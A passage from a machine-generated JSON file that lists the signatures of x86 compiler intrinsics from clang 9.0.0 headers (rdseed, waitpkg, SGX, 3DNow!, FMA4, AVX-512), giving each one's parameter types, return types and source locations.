8 } }, { "tag": "parameter", "name": "__x", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "function", "name": "_rdseed16_step", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/rdseedintrin.h:21:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":unsigned-short", "bit-size": 16, "bit-alignment": 16 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_rdseed32_step", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/rdseedintrin.h:27:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_rdseed64_step", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/rdseedintrin.h:34:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_wbnoinvd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/wbnoinvdintrin.h:19:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_cldemote", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/cldemoteintrin.h:22:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_umonitor", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/waitpkgintrin.h:21:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__address", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_umwait", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/waitpkgintrin.h:27:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__control", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__counter", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "function", "name": "_tpause", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/waitpkgintrin.h:34:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__control", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__counter", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "function", "name": "_directstoreu_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/movdirintrin.h:19:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__dst", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__value", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_directstoreu_u64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/movdirintrin.h:29:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__dst", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__value", "type": { "tag": ":unsigned-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_movdir64b", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/movdirintrin.h:44:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__dst", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__src", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_pconfig_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/pconfigintrin.h:26:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__leaf", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__d", "type": { "tag": ":pointer", "type": { "tag": ":unsigned-long", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_enclu_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/sgxintrin.h:24:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__leaf", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__d", "type": { "tag": ":pointer", "type": { "tag": ":unsigned-long", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_encls_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/sgxintrin.h:35:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__leaf", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__d", "type": { "tag": ":pointer", "type": { "tag": ":unsigned-long", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_enclv_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/sgxintrin.h:46:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__leaf", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__d", "type": { "tag": ":pointer", "type": { "tag": ":unsigned-long", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_ptwrite32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/ptwriteintrin.h:22:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__value", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_ptwrite64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/ptwriteintrin.h:29:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__value", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_invpcid", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/invpcidintrin.h:19:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__type", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__descriptor", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_2intersect_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vp2intersectintrin.h:51:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__m0", "type": { "tag": ":pointer", "type": { "tag": "__mmask16" } } }, { "tag": "parameter", "name": "__m1", "type": { "tag": ":pointer", "type": { "tag": "__mmask16" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_2intersect_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vp2intersectintrin.h:71:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__m0", "type": { "tag": ":pointer", "type": { "tag": "__mmask8" } } }, { "tag": "parameter", "name": "__m1", "type": { "tag": ":pointer", "type": { "tag": "__mmask8" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_2intersect_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvp2intersectintrin.h:54:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__m0", "type": { "tag": ":pointer", "type": { "tag": "__mmask8" } } }, { "tag": "parameter", "name": "__m1", "type": { "tag": ":pointer", "type": { "tag": "__mmask8" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_2intersect_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvp2intersectintrin.h:74:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__m0", "type": { "tag": ":pointer", "type": { "tag": "__mmask8" } } }, { "tag": "parameter", "name": "__m1", "type": { "tag": ":pointer", "type": { "tag": "__mmask8" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_2intersect_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvp2intersectintrin.h:94:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__m0", "type": { "tag": ":pointer", "type": { "tag": "__mmask8" } } }, { "tag": "parameter", "name": "__m1", "type": { "tag": ":pointer", "type": { "tag": "__mmask8" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_2intersect_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvp2intersectintrin.h:114:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__m0", "type": { "tag": ":pointer", "type": { "tag": "__mmask8" } } }, { "tag": "parameter", "name": "__m1", "type": { "tag": ":pointer", "type": { "tag": "__mmask8" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_enqcmd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/enqcmdintrin.h:36:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__dst", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__src", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_enqcmds", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/enqcmdintrin.h:56:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__dst", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__src", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_m_prefetch", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/prfchwintrin.h:29:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_m_prefetchw", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/prfchwintrin.h:50:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":void" } }, { "tag": "typedef", "ns": 0, "name": "__v2sf", "location": "/usr/lib/clang/9.0.0/include/mm3dnow.h:16:15", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "function", "name": "_m_femms", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mm3dnow.h:22:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_m_pavgusb", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mm3dnow.h:27:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_m_pf2id", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mm3dnow.h:32:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_m_pfacc", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mm3dnow.h:37:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_m_pfadd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mm3dnow.h:42:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_m_pfcmpeq", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mm3dnow.h:47:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_m_pfcmpge", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mm3dnow.h:52:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_m_pfcmpgt", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mm3dnow.h:57:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_m_pfmax", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mm3dnow.h:62:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_m_pfmin", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mm3dnow.h:67:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_m_pfmul", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mm3dnow.h:72:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_m_pfrcp", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mm3dnow.h:77:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_m_pfrcpit1", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mm3dnow.h:82:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_m_pfrcpit2", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mm3dnow.h:87:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_m_pfrsqrt", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mm3dnow.h:92:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_m_pfrsqrtit1", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mm3dnow.h:97:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_m_pfsub", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mm3dnow.h:102:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_m_pfsubr", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mm3dnow.h:107:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_m_pi2fd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mm3dnow.h:112:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_m_pmulhrw", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mm3dnow.h:117:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_m_pf2iw", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mm3dnow.h:126:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_m_pfnacc", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mm3dnow.h:131:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_m_pfpnacc", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mm3dnow.h:136:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_m_pi2fw", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mm3dnow.h:141:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_m_pswapdsf", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mm3dnow.h:146:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_m_pswapdsi", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mm3dnow.h:151:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_extract_si64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/ammintrin.h:66:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__y", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_insert_si64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/ammintrin.h:136:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__y", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_stream_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/ammintrin.h:154:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_stream_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/ammintrin.h:172:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_macc_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fma4intrin.h:24:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_macc_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fma4intrin.h:30:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_macc_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fma4intrin.h:36:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_macc_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fma4intrin.h:42:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_msub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fma4intrin.h:48:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_msub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fma4intrin.h:54:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_msub_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fma4intrin.h:60:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_msub_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fma4intrin.h:66:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_nmacc_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fma4intrin.h:72:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_nmacc_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fma4intrin.h:78:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_nmacc_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fma4intrin.h:84:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_nmacc_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fma4intrin.h:90:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_nmsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fma4intrin.h:96:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_nmsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fma4intrin.h:102:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_nmsub_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fma4intrin.h:108:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_nmsub_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fma4intrin.h:114:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": 